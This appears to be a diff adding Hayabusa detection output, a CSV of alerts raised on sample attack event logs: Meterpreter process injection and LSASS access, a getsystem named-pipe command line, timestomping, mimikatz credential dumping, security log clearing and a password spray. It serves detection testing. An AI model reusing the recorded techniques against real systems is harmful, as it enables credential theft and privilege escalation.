+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1344 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-001058500E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:26:34.133 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: \\vboxsrv\HTools\m.exe | Tgt Process: C:\Windows\explorer.exe | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2812 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010135F0600,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/meterpreter_migrate_to_explorer_sysmon_8.evtx
+2019-04-30 16:46:15.215 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /c echo msdhch > \\.\pipe\msdhch | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 4088 | PGUID: 365ABB72-FD47-5CC7-0000-00106AF61D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
+2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,PrivEsc,Meterpreter or Cobalt Strike Getsystem Service Start,,rules/sigma/process_creation/proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
+2019-04-30 16:46:15.215 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
+2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
+2019-04-30 19:12:45.583 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bs.ps1 | Process: C:\Windows\system32\cmd.exe | PID: 3292 | PGUID: 365ABB72-1EFA-5CC8-0000-0010D3DE1C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_2_11_evasion_timestomp_MACE.evtx
+2019-04-30 19:13:42.052 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bs.ps1 | Process: C:\Windows\Explorer.EXE | CreationUtcTime: 2016-02-02 15:30:02.000 | PreviousCreationUtcTime: 2019-04-30 10:12:45.583 | PID: %PID% | PGUID: 365ABB72-16CD-5CC8-0000-0010483A0600,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_2_11_evasion_timestomp_MACE.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\smss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 264 | Tgt PGUID: 365ABB72-3FDE-5CC8-0000-0010142B0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 336 | Tgt PGUID: 365ABB72-3FDF-5CC8-0000-00103C480000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 384 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-0010014C0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\wininit.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 392 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00101E4C0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 440 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00104D520000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 468 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00100D550000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,CredAccess,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,CredAccess,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-05-01 03:08:22.618 +09:00,Sec504Student,1102,high,Evas,Security Log Cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 04:27:00.297 +09:00,DESKTOP-JR78RLP,1102,high,Evas,Security Log Cleared,User: jwrig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:02.847 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:02.847 +09:00,-,-,medium,CredAccess,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:41 TargetUserName:wstrzelec/zmathis/lpesce/psmith/lschifano/sanson/sarmstrong/drook/bgalbraith/melliott/bhostetler/edygert/ebooth/jleytevidal/jorchilles/bking/cdavis/jwright/celgee/jlake/gsalinas/jkulikowski/mdouglas/dpendolino/thessman/cfleener/cspizor/rbowes/bgreenwood/cmoody/mtoussain/eskoudis/smisenar/kperryman/cragoso/ssims/Administrator/dmashburn/baker/tbennett/econrad IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,-
+2019-05-01 04:27:03.925 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:05.020 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:06.085 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:07.171 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:08.254 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:09.323 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:10.377 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:11.465 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:12.549 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:13.611 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:14.687 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:15.750 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:16.841 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:17.922 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:19.035 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:20.097 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:21.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:22.222 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:23.295 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:24.342 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:25.404 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:26.504 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:27.583 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:28.654 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:29.712 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
